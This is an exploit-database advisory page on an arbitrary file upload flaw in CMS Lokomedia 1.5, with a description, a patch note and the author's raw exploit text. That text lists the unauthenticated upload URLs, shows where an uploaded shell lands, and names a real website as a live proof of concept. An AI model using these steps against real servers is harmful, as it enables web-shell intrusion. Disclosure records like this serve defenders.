CMS Lokomedia 1.5 Arbitary file upload vulnerability

vendor:

CMS Lokomedia

by:

eidelweiss

8.8

CVSS

HIGH

Arbitary file upload

434

CWE

Product Name: CMS Lokomedia

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:bukulokomedia:cms_lokomedia

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

CMS Lokomedia 1.5 Arbitary file upload vulnerability

CMS Lokomedia is vulnerable to an arbitrary file upload vulnerability. An attacker can upload malicious files to the server, which can be used to gain access to the server. The vulnerability exists in the 'tinymcpuk/filemanager/browser.html' page, which allows an attacker to upload files to the server. The uploaded files are stored in the 'lokomedia/tinymcpuk/gambar' directory. The vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable page.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of CMS Lokomedia.

Source

Exploit-DB raw data:

===================================================================
    CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
   
Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:	use your skill and play your imagination :P

Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^


References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
===================================================================
 

----------------------------------
 
    exploit & p0c

[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
		or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
 
    your shell or file will be placed here
 
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)		*/
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here

----------------------------------

	live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
   
   
====================================================================
   
    Nothing Impossible In This World Even Nobody`s Perfect
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================